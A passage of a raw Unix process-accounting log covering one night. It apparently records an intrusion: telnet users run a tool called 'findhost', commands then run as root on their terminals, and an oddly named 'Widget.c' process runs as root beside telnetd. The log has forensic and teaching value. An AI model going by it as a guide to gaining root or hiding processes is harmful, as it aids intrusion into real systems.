ttyp2 0.61 secs Sat Jun 3 01:29 17950 grep S imajnari ttyp2 0.03 secs Sat Jun 3 01:29 17949 findhost S imajnari ttyp2 0.12 secs Sat Jun 3 01:28 17948 bash imajnari __ 0.48 secs Sat Jun 3 00:57 17947 telnetd S root __ 1.11 secs Sat Jun 3 00:57 17941 cat imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17940 bash F imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17939 stty imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17938 tset imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17937 hostname imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17936 bash F imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17930 bash imajnari ttyp2 0.01 secs Sat Jun 3 01:29 17923 ls S root ttyp2 0.02 secs Sat Jun 3 01:29 17922 l S root ttyp2 0.14 secs Sat Jun 3 01:29 17911 last S root ttyp2 0.59 secs Sat Jun 3 01:29 17910 grep S root ttyp2 0.01 secs Sat Jun 3 01:29 17909 ls S root ttyp2 0.01 secs Sat Jun 3 01:29 17877 ls S root ttyp2 0.02 secs Sat Jun 3 01:30 17867 ls S root ttyp2 0.02 secs Sat Jun 3 01:30 17859 ls S root ttyp2 0.02 secs Sat Jun 3 01:30 17848 ls S root ttyp2 0.01 secs Sat Jun 3 01:30 17847 ls S root ttyp2 0.01 secs Sat Jun 3 01:30 17832 ls S root ttyp2 0.02 secs Sat Jun 3 01:30 17821 ls S root ttyp2 0.01 secs Sat Jun 3 01:30 17820 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17819 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17815 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17814 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17810 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17804 ls S root ttyp2 0.01 secs Sat Jun 3 01:31 17788 finger S root ttyp2 0.09 secs Sat Jun 3 01:31 17779 finger S root ttyp2 0.08 secs Sat Jun 3 01:31 17770 finger S root ttyp2 0.08 secs Sat Jun 3 01:31 17768 ls S root ttyp2 0.01 secs Sat Jun 3 01:32 17756 ls S root ttyp2 0.01 secs Sat Jun 3 01:32 17747 finger S root ttyp2 0.08 secs Sat Jun 3 01:32 17735 cat S root __ 0.01 secs Sat Jun 3 01:32 17734 sendmail SF root __ 0.01 secs Sat Jun 3 01:32 17733 sendmail S root __ 0.20 secs Sat Jun 3 01:32 17732 sh S root __ 0.01 secs Sat Jun 3 01:32 17731 sendmail SF root __ 0.02 secs Sat Jun 3 01:32 17730 ls S root ttyp2 0.01 secs Sat Jun 3 01:32 17724 f S root ttyp2 0.08 secs Sat Jun 3 01:32 17723 passwd S root ttyp3 0.12 secs Sat Jun 3 01:32 17717 f S root ttyp2 0.08 secs Sat Jun 3 01:33 17715 passwd S root ttyp2 0.06 secs Sat Jun 3 01:33 17714 ls S root ttyp2 0.01 secs Sat Jun 3 01:33 17708 finger S root ttyp2 0.08 secs Sat Jun 3 01:33 17707 ls S root ttyp2 0.02 secs Sat Jun 3 01:34 17701 finger S root ttyp2 0.08 secs Sat Jun 3 01:34 17700 sh S root ttyp2 0.23 secs Sat Jun 3 01:29 17699 sh root ttyp2 0.05 secs Sat Jun 3 01:29 17679 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:35 17675 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:35 17661 findhost S imajnari ttyp2 0.11 secs Sat Jun 3 01:34 17654 ls imajnari ttyp2 0.01 secs Sat Jun 3 01:35 17637 finger imajnari ttyp2 0.09 secs Sat Jun 3 01:35 17631 finger imajnari ttyp2 0.08 secs Sat Jun 3 01:35 17624 ls imajnari ttyp2 0.01 secs Sat Jun 3 01:36 17623 ls imajnari ttyp2 0.01 secs Sat Jun 3 01:36 17619 ls S root ttyp2 0.02 secs Sat Jun 3 01:36 17618 sendmail SF root __ 0.05 secs Sat Jun 3 01:35 17616 sendmail SF root __ 0.06 secs Sat Jun 3 01:36 17602 sendmail SF root __ 0.05 secs Sat Jun 3 01:36 17600 sendmail SF root __ 0.06 secs Sat Jun 3 01:36 17596 passwd S root ttyp2 0.09 secs Sat Jun 3 01:36 17594 ls S root ttyp2 0.02 secs Sat Jun 3 01:37 17593 l S root ttyp2 0.16 secs Sat Jun 3 01:37 17588 sendmail SF root __ 0.05 secs Sat Jun 3 01:36 17586 sendmail SF root __ 0.05 secs Sat Jun 3 01:37 17581 l S root ttyp2 0.14 secs Sat Jun 3 01:37 17579 sendmail SF root __ 0.03 secs Sat Jun 3 01:34 17560 cat S root __ 0.01 secs Sat Jun 3 01:37 17559 sendmail SF root __ 0.01 secs Sat Jun 3 01:37 17558 sendmail S root __ 0.20 secs Sat Jun 3 01:37 17557 sh S root __ 0.01 secs Sat Jun 3 01:37 17556 sendmail SF root __ 0.01 secs Sat Jun 3 01:37 17548 cat itot ttyp4 0.01 secs Sat Jun 3 01:37 17547 bash F itot ttyp4 0.01 secs Sat Jun 3 01:37 17546 stty itot ttyp4 0.01 secs Sat Jun 3 01:37 17545 tset itot ttyp4 0.01 secs Sat Jun 3 01:37 17544 hostname itot ttyp4 0.01 secs Sat Jun 3 01:37 17543 bash F itot ttyp4 0.01 secs Sat Jun 3 01:37 17532 sendmail SF root __ 0.05 secs Sat Jun 3 01:37 17526 mail S itot ttyp4 0.02 secs Sat Jun 3 01:37 17522 sendmail SF root __ 0.05 secs Sat Jun 3 01:37 17516 whoami S itot ttyp4 0.01 secs Sat Jun 3 01:38 17510 passwd S root ttyp4 0.06 secs Sat Jun 3 01:38 17497 ls S itot ttyp4 0.01 secs Sat Jun 3 01:39 17496 ls S itot ttyp4 0.01 secs Sat Jun 3 01:39 17483 sendmail SF root __ 0.05 secs Sat Jun 3 01:33 17472 passwd S root ttyp4 0.17 secs Sat Jun 3 01:39 17456 ls S root ttyp4 0.01 secs Sat Jun 3 01:40 17453 l S root ttyp4 0.16 secs Sat Jun 3 01:40 17439 l S root ttyp4 0.14 secs Sat Jun 3 01:40 17401 passwd S root ttyp4 0.12 secs Sat Jun 3 01:40 17400 sh S root ttyp4 0.09 secs Sat Jun 3 01:39 17399 sendmail SF root __ 0.03 secs Sat Jun 3 01:35 17398 sh root ttyp4 0.05 secs Sat Jun 3 01:39 17397 findhost S itot ttyp4 0.12 secs Sat Jun 3 01:38 17396 bash itot __ 0.27 secs Sat Jun 3 01:37 17395 telnetd S root __ 0.20 secs Sat Jun 3 01:37 17391 sendmail SF root __ 0.17 secs Sat Jun 3 01:41 17390 sendmail SF root __ 0.05 secs Sat Jun 3 01:39 17388 sendmail SF root __ 0.06 secs Sat Jun 3 01:41 17379 Widget.c S root __ 0.20 secs Sat Jun 3 01:41 17378 telnetd S root __ 0.08 secs Sat Jun 3 01:41 17377 sendmail SF root __ 0.06 secs Sat Jun 3 01:41 17375 sendmail SF root __ 0.06 secs Sat Jun 3 01:41 17374 sendmail SF root __ 0.02 secs Sat Jun 3 01:40 17358 cat S root __ 0.01 secs Sat Jun 3 01:42 17357 sendmail SF root __ 0.01 secs Sat Jun 3 01:42 17356 sendmail S root __ 0.20 secs Sat Jun 3 01:42 17355 sh S root __ 0.01 secs Sat Jun 3 01:42 17354 sendmail SF root __ 0.02 secs Sat Jun 3 01:42 17353 cat itot ttyp4 0.01 secs Sat Jun 3 01:42 17352 bash F itot ttyp4 0.01 secs Sat Jun 3 01:42 17351 stty itot ttyp4 0.01 secs Sat Jun 3 01:42 17350 tset itot ttyp4 0.01 secs Sat Jun 3 01:42 17349 hostname itot ttyp4 0.01 secs Sat Jun 3 01:42 17348 bash F itot ttyp4 0.01 secs Sat Jun 3 01:42 17342 ls S itot ttyp4 0.01 secs Sat Jun 3 01:43 17341 ls S itot ttyp4 0.01 secs Sat Jun 3 01:43 17340 ls S itot ttyp4 0.01 secs Sat Jun 3 01:43 17339 l S itot ttyp4 0.16 secs Sat Jun 3 01:43 17338 l S itot ttyp4 0.14 secs Sat Jun 3 01:43 17337 ls S itot ttyp4 0.01 secs Sat Jun 3 01:43 17336 sendmail SF root __ 0.05 secs Sat Jun 3 01:41 17330 sendmail SF root __ 0.05 secs Sat Jun 3 01:42 17328 sendmail SF root __ 0.05 secs Sat Jun 3 01:43 17322 sendmail SF root __ 0.05 secs Sat Jun 3 01:41 17316 ls S itot ttyp4 0.01 secs Sat Jun 3 01:43 17315 id S itot ttyp4 0.01 secs Sat Jun 3 01:43 17304 finger S itot ttyp4 0.19 secs Sat Jun 3 01:44 17303 grep S itot ttyp4 0.02 secs Sat Jun 3 01:44 17297 finger S itot ttyp4 0.16 secs Sat Jun 3 01:44 17270 arp S itot ttyp4 0.03 secs Sat Jun 3 01:45 17244 ls S root ttyp2 0.01 secs Sat Jun 3 01:45 17243 ls S root ttyp2 0.01 secs Sat Jun 3 01:45 17236 whoami S root ttyp2 0.01 secs Sat Jun 3 01:46 17235 sh S root ttyp2 0.09 secs Sat Jun 3 01:36 17234 whoami root ttyp2 0.01 secs Sat Jun 3 01:46 17233 sh root ttyp2 0.05 secs Sat Jun 3 01:36 17229 bash imajnari __ 0.39 secs Sat Jun 3 01:29 17228 telnetd S root __ 0.44 secs Sat Jun 3 01:29 17224 id S itot ttyp4 0.01 secs Sat Jun 3 01:46 17216 findhost S itot ttyp4 0.22 secs Sat Jun 3 01:42 17209 bash itot __ 0.25 secs Sat Jun 3 01:42 17208 telnetd S root __ 0.17 secs Sat Jun 3 01:42 17169 cat S root __ 0.01 secs Sat Jun 3 01:47 17168 sendmail SF root __ 0.01 secs Sat Jun 3 01:47 17167 sendmail S root __ 0.22 secs Sat Jun 3 01:47 17166 sh S root __ 0.01 secs Sat Jun 3 01:47 17165 sendmail SF root __ 0.02 secs Sat Jun 3 01:47 17131 sendmail SF root __ 0.02 secs Sat Jun 3 01:47 17103 sendmail SF root __ 0.05 secs Sat Jun 3 01:48 17101 sendmail SF root __ 0.06 secs Sat Jun 3 01:49 17095 sendmail SF root __ 0.05 secs Sat Jun 3 01:49 17094 sendmail SF root __ 0.02 secs Sat Jun 3 01:48 17093 sendmail SF root __ 0.05 secs Sat Jun 3 01:49 17092 sendmail SF root __ 0.02 secs Sat Jun 3 01:48 17090 sendmail SF root __ 0.05 secs Sat Jun 3 01:49 17088 sendmail SF root __ 0.05 secs Sat Jun 3 01:49 17087 sendmail SF root __ 0.03 secs Sat Jun 3 01:46 17047 sendmail SF root __ 0.06 secs Sat Jun 3 01:49 17045 sendmail SF root __ 0.06 secs Sat Jun 3 01:50 17042 sendmail SF root __ 0.03 secs Sat Jun 3 01:48 17014 sendmail SF root __ 0.02 secs Sat Jun 3 01:48 16994 sendmail SF root __ 0.02 secs Sat Jun 3 01:50 16993 sendmail SF root __ 0.02 secs Sat Jun 3 01:50 16947 cat S root __ 0.01 secs Sat Jun 3 01:52 16946 sendmail SF root __ 0.01 secs Sat Jun 3 01:52 16945 sendmail S root __ 0.20 secs Sat Jun 3 01:52 16944 sh S root __ 0.01 secs Sat Jun 3 01:52 16943 sendmail SF root __ 0.02 secs Sat Jun 3 01:52 16927 proftpd S root __ 1.02 secs Sat Jun 3 01:40 16920 sendmail SF root __ 0.05 secs Sat Jun 3 01:52 16917 sendmail SF root __ 0.05 secs Sat Jun 3 01:52 16916 sendmail SF root __ 0.05 secs Sat Jun 3 01:51 16900 sendmail SF root __ 0.05 secs Sat Jun 3 01:53 16898 sendmail SF root __ 0.05 secs Sat Jun 3 01:53 16895 sendmail SF root __ 0.03 secs Sat Jun 3 01:52 16797 telnetd S root __ 0.23 secs Sat Jun 3 01:31 16777 sendmail SF root __ 0.05 secs Sat Jun 3 01:56 16770 sendmail SF root __ 0.05 secs Sat Jun 3 01:55 16736 sendmail SF root __ 0.06 secs Sat Jun 3 01:56 16725 cat S root __ 0.01 secs Sat Jun 3 01:57 16724 sendmail SF root __ 0.01 secs Sat Jun 3 01:57 16723 sendmail S root __ 0.20 secs Sat Jun 3 01:57 16722 sh S root __ 0.01 secs Sat Jun 3 01:57 16721 sendmail SF root __ 0.02 secs Sat Jun 3 01:57 16699 sendmail SF root __ 0.05 secs Sat Jun 3 01:56 16689 sendmail SF root __ 0.05 secs Sat Jun 3 01:58 16688 sendmail SF root __ 0.03 secs Sat Jun 3 01:57 16686 sendmail SF root __ 0.05 secs Sat Jun 3 01:58 16669 sendmail SF root __ 0.05 secs Sat Jun 3 01:59 16667 sendmail SF root __ 0.05 secs Sat Jun 3 01:59 16666 sendmail SF root __ 0.03 secs Sat Jun 3 01:57 16634 sendmail SF root __ 0.05 secs Sat Jun 3 01:59 16629 sendmail SF root __ 0.03 secs Sat Jun 3 01:58 16596 sendmail SF root __ 0.08 secs Sat Jun 3 02:00 16592 sendmail SF root __ 0.05 secs Sat Jun 3 02:00 16591 sendmail SF root __ 0.02 secs Sat Jun 3 02:00 16589 sendmail SF root __ 0.05 secs Sat Jun 3 02:00 16566 sendmail SF root __ 0.08 secs Sat Jun 3 02:01 16565 sendmail SF root __ 0.03 secs Sat Jun 3 02:00 16562 sendmail SF root __ 0.14 secs Sat Jun 3 02:01 16542 sendmail SF root __ 0.05 secs Sat Jun 3 02:01 16540 sendmail SF root __ 0.05 secs Sat Jun 3 02:02 16538 sendmail SF root __ 0.03 secs Sat Jun 3 02:00 16530 cat S root __ 0.01 secs Sat Jun 3 02:02 16529 sendmail SF root __ 0.01 secs Sat Jun 3 02:02 16528 sendmail S root __ 0.20 secs Sat Jun 3 02:02 16527 sh S root __ 0.01 secs Sat Jun 3 02:02 16526 sendmail SF root __ 0.01 secs Sat Jun 3 02:02 16514 sendmail SF root __ 0.05 secs Sat Jun 3 02:03 16513 sendmail SF root __ 0.03 secs Sat Jun 3 02:02 16507 sendmail SF root __ 0.05 secs Sat Jun 3 02:03 16505 sendmail SF root __ 0.06 secs Sat Jun 3 02:04 16504 sendmail SF root __ 0.03 secs Sat Jun 3 02:02 16502 sendmail SF root __ 0.08 secs Sat Jun 3 02:03 16501 sendmail SF root __ 0.03 secs Sat Jun 3 02:03 16499 sendmail SF root __ 0.05 secs Sat Jun 3 02:04 16497 sendmail SF root __ 0.05 secs Sat Jun 3 02:03 16460 sendmail SF root __ 0.05 secs Sat Jun 3 02:05 16459 sendmail SF root __ 0.03 secs Sat Jun 3 02:04 16444 sendmail SF root __ 0.06 secs Sat Jun 3 02:05 16442 sendmail SF root __ 0.05 secs Sat Jun 3 02:04 16440 sendmail SF root __ 0.06 secs Sat Jun 3 02:05 16439 sendmail SF root __ 0.03 secs Sat Jun 3 02:05 16438 sendmail SF root __ 0.02 secs Sat Jun 3 02:05 16436 sendmail SF root __ 0.06 secs Sat Jun 3 02:05 16429 sendmail SF root __ 0.02 secs Sat Jun 3 02:04 16357 cat S root __ 0.01 secs Sat Jun 3 02:07 16356 sendmail SF root __ 0.01 secs Sat Jun 3 02:07 16355 sendmail S root __ 0.22 secs Sat Jun 3 02:07 16354 sh S root __ 0.01 secs Sat Jun 3 02:07 16353 sendmail SF root __ 0.02 secs Sat Jun 3 02:07 16342 sendmail SF root __ 0.05 secs Sat Jun 3 02:07 16340 sendmail SF root __ 0.05 secs Sat Jun 3 02:07 16338 sendmail SF root __ 0.05 secs Sat Jun 3 02:06 16330 sendmail SF root __ 0.05 secs Sat Jun 3 02:08 16328 sendmail SF root __ 0.03 secs Sat Jun 3 02:07 16326 sendmail SF root __ 0.05 secs Sat Jun 3 02:08 16282 sendmail SF root __ 0.05 secs Sat Jun 3 02:09 16280 sendmail SF root __ 0.06 secs Sat Jun 3 02:10 16261 sendmail SF root __ 0.03 secs Sat Jun 3 02:08 16253 sendmail SF root __ 0.05 secs Sat Jun 3 02:11 16252 sendmail SF root __ 0.03 secs Sat Jun 3 02:10 16250 sendmail SF root __ 0.08 secs Sat Jun 3 02:11 16227 cat S root __ 0.01 secs Sat Jun 3 02:12 16226 sendmail SF root __ 0.01 secs Sat Jun 3 02:12 16225 sendmail S root __ 0.22 secs Sat Jun 3 02:12 16224 sh S root __ 0.01 secs Sat Jun 3 02:12 16223 sendmail SF root __ 0.02 secs Sat Jun 3 02:12 16191 sendmail SF root __ 0.09 secs Sat Jun 3 02:11 16163 proftpd S root __ 1.12 secs Sat Jun 3 02:00 16045 sendmail SF root __ 0.08 secs Sat Jun 3 02:16 16043 sendmail SF root __ 0.08 secs Sat Jun 3 02:16 16042 sendmail SF root __ 0.03 secs Sat Jun 3 02:15 16008 cat S root __ 0.01 secs Sat Jun 3 02:17 16007 sendmail SF root __ 0.01 secs Sat Jun 3 02:17 16006 sendmail S root __ 0.20 secs Sat Jun 3 02:17 16005 sh S root __ 0.01 secs Sat Jun 3 02:17 16004 sendmail SF root __ 0.02 secs Sat Jun 3 02:17 15945 telnetd S root __ 0.53 secs Sat Jun 3 02:04 15944 sendmail SF root __ 0.05 secs Sat Jun 3 02:18 15943 sendmail SF root __ 0.03 secs Sat Jun 3 02:18 15941 sendmail SF root __ 0.06 secs Sat Jun 3 02:19 15893 sendmail SF root __ 0.06 secs Sat Jun 3 02:20 15892 sendmail SF root __ 0.03 secs Sat Jun 3 02:19 15878 sendmail SF root __ 0.06 secs Sat Jun 3 02:20 15836 Widget.c S root __ 0.08 secs Sat Jun 3 00:10 15835 telnetd S root __ 0.08 secs Sat Jun 3 00:10 15834 sendmail SF root __ 0.06 secs Sat Jun 3 02:21 15832 sendmail SF root __ 0.09 secs Sat Jun 3 02:22 15828 sendmail SF root __ 0.03 secs Sat Jun 3 02:21 15815 cat S root __ 0.01 secs Sat Jun 3 02:22 15814 sendmail SF root __ 0.01 secs Sat Jun 3 02:22 15813 sendmail S root __ 0.20 secs Sat Jun 3 02:22 15812 sh S root __ 0.01 secs Sat Jun 3 02:22 15810 sendmail SF root __ 0.02 secs Sat Jun 3 02:22 15766 sendmail SF root __ 0.05 secs Sat Jun 3 02:23 15765 sendmail SF root __ 0.05 secs Sat Jun 3 02:23 15759 sendmail SF root __ 0.05 secs Sat Jun 3 02:23 15758 sendmail SF root __ 0.03 secs Sat Jun 3 02:23 15755 sendmail SF root __ 0.06 secs Sat Jun 3 02:24 15754 sendmail SF root __ 0.06 secs Sat Jun 3 02:24 15752 sendmail SF root __ 0.05 secs Sat Jun 3 02:24 15751 sendmail SF root __ 0.03 secs Sat Jun 3 02:24 15749 sendmail SF root __ 0.05 secs Sat Jun 3 02:24 15684 proftpd S root __ 0.70 secs Sat Jun 3 02:15 15623 cat S root __ 0.01 secs Sat Jun 3 02:27 15622 sendmail SF root __ 0.01 secs Sat Jun 3 02:27 15621 sendmail S root __ 0.20 secs Sat Jun 3 02:27 15620 sh S root __ 0.01 secs Sat Jun 3 02:27 15619 sendmail SF root __ 0.01 secs Sat Jun 3 02:27 15438 cat S root __ 0.01 secs Sat Jun 3 02:32 15437 sendmail SF root __ 0.01 secs Sat Jun 3 02:32 15436 sendmail S root __ 0.20 secs Sat Jun 3 02:32 15435 sh S root __ 0.01 secs Sat Jun 3 02:32 15434 sendmail SF root __ 0.02 secs Sat Jun 3 02:32 15355 sendmail SF root __ 0.05 secs Sat Jun 3 02:33 15353 sendmail SF root __ 0.05 secs Sat Jun 3 02:34 15352 sendmail SF root __ 0.03 secs Sat Jun 3 02:33 15293 telnetd S root __ 0.09 secs Sat Jun 3 02:32 15231 cat S root __ 0.01 secs Sat Jun 3 02:37 15230 sendmail SF root __ 0.01 secs Sat Jun 3 02:37 15229 sendmail S root __ 0.20 secs Sat Jun 3 02:37 15228 sh S root __ 0.01 secs Sat Jun 3 02:37 15227 sendmail SF root __ 0.02 secs Sat Jun 3 02:37 15204 sendmail SF root __ 0.05 secs Sat Jun 3 02:38 15202 sendmail SF root __ 0.05 secs Sat Jun 3 02:38 15200 sendmail SF root __ 0.03 secs Sat Jun 3 02:37 15182 proftpd S root __ 0.62 secs Sat Jun 3 01:34 15181 sendmail SF root __ 0.03 secs Sat Jun 3 02:38 15180 sendmail SF root __ 0.03 secs Sat Jun 3 02:37 15158 sendmail SF root __ 0.08 secs Sat Jun 3 02:39 15128 sendmail SF root __ 0.02 secs Sat Jun 3 02:40 15105 sendmail SF root __ 0.05 secs Sat Jun 3 02:41 15104 sendmail SF root __ 0.03 secs Sat Jun 3 02:41 15099 sendmail SF root __ 0.05 secs Sat Jun 3 02:41 15090 cat S root __ 0.01 secs Sat Jun 3 02:42 15089 sendmail SF root __ 0.01 secs Sat Jun 3 02:42 15088 sendmail S root __ 0.20 secs Sat Jun 3 02:42 15087 sh S root __ 0.01 secs Sat Jun 3 02:42 15086 sendmail SF root __ 0.01 secs Sat Jun 3 02:42 15083 proftpd S root __ 0.22 secs Sat Jun 3 02:33 15078 proftpd S root __ 1.12 secs Sat Jun 3 02:33 15077 sendmail SF root __ 0.05 secs Sat Jun 3 02:41 15065 sendmail SF root __ 0.05 secs Sat Jun 3 02:44 15063 sendmail SF root __ 0.05 secs Sat Jun 3 02:44 15062 sendmail SF root __ 0.03 secs Sat Jun 3 02:43 15051 sendmail SF root __ 0.05 secs Sat Jun 3 02:44 15049 sendmail SF root __ 0.06 secs Sat Jun 3 02:44 15048 sendmail SF root __ 0.03 secs Sat Jun 3 02:44 14981 cat S root __ 0.01 secs Sat Jun 3 02:47 14980 sendmail SF root __ 0.01 secs Sat Jun 3 02:47 14979 sendmail S root __ 0.20 secs Sat Jun 3 02:47 14978 sh S root __ 0.01 secs Sat Jun 3 02:47 14977 sendmail SF root __ 0.02 secs Sat Jun 3 02:47 14967 telnetd S root __ 0.55 secs Sat Jun 3 01:40 14950 sendmail SF root __ 0.05 secs Sat Jun 3 02:48 14948 sendmail SF root __ 0.05 secs Sat Jun 3 02:48 14947 sendmail SF root __ 0.05 secs Sat Jun 3 02:47 14937 sendmail SF root __ 0.05 secs Sat Jun 3 02:48 14935 sendmail SF root __ 0.05 secs Sat Jun 3 02:49 14934 sendmail SF root __ 0.03 secs Sat Jun 3 02:48 14932 proftpd S root __ 0.22 secs Sat Jun 3 02:49 14854 cat S root __ 0.01 secs Sat Jun 3 02:52 14853 sendmail SF root __ 0.01 secs Sat Jun 3 02:52 14852 sendmail S root __ 0.20 secs Sat Jun 3 02:52 14851 sh S root __ 0.01 secs Sat Jun 3 02:52 14850 sendmail SF root __ 0.02 secs Sat Jun 3 02:52 14772 sendmail SF root __ 0.05 secs Sat Jun 3 02:55 14771 sendmail SF root __ 0.05 secs Sat Jun 3 02:55 14770 sendmail SF root __ 0.03 secs Sat Jun 3 02:54 14767 sendmail SF root __ 0.05 secs Sat Jun 3 02:55 14766 sendmail SF root __ 0.05 secs Sat Jun 3 02:55 14709 sendmail SF root __ 0.05 secs Sat Jun 3 02:56 14707 sendmail SF root __ 0.05 secs Sat Jun 3 02:57 14705 sendmail SF root __ 0.03 secs Sat Jun 3 02:56 14688 cat S root __ 0.01 secs Sat Jun 3 02:57 14687 sendmail SF root __ 0.01 secs Sat Jun 3 02:57 14686 sendmail S root __ 0.20 secs Sat Jun 3 02:57 14685 sh S root __ 0.01 secs Sat Jun 3 02:57 14684 sendmail SF root __ 0.02 secs Sat Jun 3 02:57 14679 sendmail SF root __ 0.05 secs Sat Jun 3 02:57 14672 sendmail SF root __ 0.05 secs Sat Jun 3 02:56 14666 sendmail SF root __ 0.05 secs Sat Jun 3 02:57 14665 sendmail SF root __ 0.03 secs Sat Jun 3 02:57 14663 sendmail SF root __ 0.05 secs Sat Jun 3 02:57 14654 sendmail SF root __ 0.05 secs Sat Jun 3 02:56 14594 cat S root __ 0.01 secs Sat Jun 3 03:00 14593 sendmail SF root __ 0.01 secs Sat Jun 3 03:00 14592 sendmail S root __ 0.22 secs Sat Jun 3 03:00 14591 sh S root __ 0.01 secs Sat Jun 3 03:00 14589 sendmail SF root __ 0.02 secs Sat Jun 3 03:00 14583 sendmail SF root __ 0.03 secs Sat Jun 3 02:55 14581 sendmail SF root __ 0.08 secs Sat Jun 3 02:57 14572 sendmail SF root __ 0.05 secs Sat Jun 3 03:00 14570 sendmail SF root __ 0.06 secs Sat Jun 3 03:00 14560 sendmail SF root __ 0.03 secs Sat Jun 3 02:59 14551 sendmail SF root __ 0.05 secs Sat Jun 3 03:00 14549 sendmail SF root __ 0.05 secs Sat Jun 3 03:00 14548 sendmail SF root __ 0.03 secs Sat Jun 3 02:59 14531 sendmail SF root __ 0.05 secs Sat Jun 3 03:01 14528 sendmail SF root __ 0.05 secs Sat Jun 3 03:02 14527 sendmail SF root __ 0.02 secs Sat Jun 3 03:01 14506 cat S root __ 0.01 secs Sat Jun 3 03:02 14505 sendmail SF root __ 0.01 secs Sat Jun 3 03:02 14504 sendmail S root __ 0.20 secs Sat Jun 3 03:02 14503 sh S root __ 0.01 secs Sat Jun 3 03:02 14502 sendmail SF root __ 0.02 secs Sat Jun 3 03:02 14501 sendmail SF root __ 0.05 secs Sat Jun 3 03:02 14499 sendmail SF root __ 0.05 secs Sat Jun 3 03:02 14498 sendmail SF root __ 0.03 secs Sat Jun 3 03:01 14497 sendmail SF root __ 0.86 secs Sat Jun 3 02:26 14417 sendmail SF root __ 0.05 secs Sat Jun 3 03:06 14415 sendmail SF root __ 0.06 secs Sat Jun 3 03:06 14414 sendmail SF root __ 0.03 secs Sat Jun 3 03:05 14413 sendmail SF root __ 0.05 secs Sat Jun 3 03:06 14411 sendmail SF root __ 0.06 secs Sat Jun 3 03:06 14410 sendmail SF root __ 0.03 secs Sat Jun 3 03:05 14381 cat S root __ 0.01 secs Sat Jun 3 03:07 14380 sendmail SF root __ 0.01 secs Sat Jun 3 03:07 14379 sendmail S root __ 0.20 secs Sat Jun 3 03:07 14378 sh S root __ 0.01 secs Sat Jun 3 03:07 14377 sendmail SF root __ 0.01 secs Sat Jun 3 03:07 14272 telnetd S root __ 0.36 secs Sat Jun 3 02:47 14263 cat S root __ 0.01 secs Sat Jun 3 03:12 14262 sendmail SF root __ 0.01 secs Sat Jun 3 03:12 14261 sendmail S root __ 0.20 secs Sat Jun 3 03:12 14260 sh S root __ 0.01 secs Sat Jun 3 03:12 14258 sendmail SF root __ 0.02 secs Sat Jun 3 03:12 14240 sendmail SF root __ 0.05 secs Sat Jun 3 03:11 14233 telnetd S root __ 0.14 secs Sat Jun 3 02:36 14209 sendmail SF root __ 0.05 secs Sat Jun 3 03:14 14207 sendmail SF root __ 0.05 secs Sat Jun 3 03:14 14206 sendmail SF root __ 0.03 secs Sat Jun 3 03:14 14177 proftpd S root __ 0.17 secs Sat Jun 3 03:10 14107 cat S root __ 0.01 secs Sat Jun 3 03:17 14105 sendmail SF root __ 0.01 secs Sat Jun 3 03:17 14104 sendmail S root __ 0.22 secs Sat Jun 3 03:17 14103 sh S root __ 0.01 secs Sat Jun 3 03:17 14102 sendmail SF root __ 0.01 secs Sat Jun 3 03:17 14095 telnetd S root __ 0.61 secs Sat Jun 3 02:23 14087 sendmail SF root __ 0.05 secs Sat Jun 3 03:17 14085 sendmail SF root __ 0.03 secs Sat Jun 3 03:17 14083 sendmail SF root __ 0.05 secs Sat Jun 3 03:18 14012 sendmail SF root __ 0.05 secs Sat Jun 3 03:21 14007 sendmail SF root __ 0.05 secs Sat Jun 3 03:20 14003 sendmail SF root __ 0.08 secs Sat Jun 3 03:21 13992 cat S root __ 0.01 secs Sat Jun 3 03:22 13991 sendmail SF root __ 0.01 secs Sat Jun 3 03:22 13990 sendmail S root __ 0.20 secs Sat Jun 3 03:22 13989 sh S root __ 0.01 secs Sat Jun 3 03:22 13988 sendmail SF root __ 0.01 secs Sat Jun 3 03:22 13985 telnetd S root __ 0.09 secs Sat Jun 3 03:19 13969 sendmail SF root __ 0.05 secs Sat Jun 3 03:23 13967 sendmail SF root __ 0.06 secs Sat Jun 3 03:23 13966 sendmail SF root __ 0.03 secs Sat Jun 3 03:22 13950 sendmail SF root __ 0.05 secs Sat Jun 3 03:24 13948 sendmail SF root __ 0.05 secs Sat Jun 3 03:24 13947 sendmail SF root __ 0.03 secs Sat Jun 3 03:23 13940 sendmail SF root __ 0.05 secs Sat Jun 3 03:24 13939 sendmail SF root __ 0.03 secs Sat Jun 3 03:24 13937 sendmail SF root __ 0.05 secs Sat Jun 3 03:24 13911 sendmail SF root __ 0.06 secs Sat Jun 3 03:25 13909 sendmail SF root __ 0.06 secs Sat Jun 3 03:25 13901 sendmail SF root __ 0.03 secs Sat Jun 3 03:24 13897 sendmail SF root __ 0.05 secs Sat Jun 3 03:25 13895 sendmail SF root __ 0.06 secs Sat Jun 3 03:26 13894 sendmail SF root __ 0.03 secs Sat Jun 3 03:25 13852 cat S root __ 0.01 secs Sat Jun 3 03:27 13851 sendmail SF root __ 0.01 secs Sat Jun 3 03:27 13850 sendmail S root __ 0.22 secs Sat Jun 3 03:27 13849 sh S root __ 0.01 secs Sat Jun 3 03:27 13848 sendmail SF root __ 0.01 secs Sat Jun 3 03:27 13828 sendmail SF root __ 0.05 secs Sat Jun 3 03:26 13767 sendmail SF root __ 0.06 secs Sat Jun 3 03:30 13765 sendmail SF root __ 0.06 secs Sat Jun 3 03:30 13761 sendmail SF root __ 0.03 secs Sat Jun 3 03:29 13726 sendmail SF root __ 0.05 secs Sat Jun 3 03:31 13722 sendmail SF root __ 0.03 secs Sat Jun 3 03:30 13712 sendmail SF root __ 0.08 secs Sat Jun 3 03:31 13703 sendmail SF root __ 0.05 secs Sat Jun 3 03:31 13702 sendmail SF root __ 0.05 secs Sat Jun 3 03:31 13698 sendmail SF root __ 0.02 secs Sat Jun 3 03:31 13697 sendmail SF root __ 0.02 secs Sat Jun 3 03:31 13694 sendmail SF root __ 0.06 secs Sat Jun 3 03:32 13693 sendmail SF root __ 0.06 secs Sat Jun 3 03:32 13692 sendmail SF root __ 0.05 secs Sat Jun 3 03:32 13691 sendmail SF root 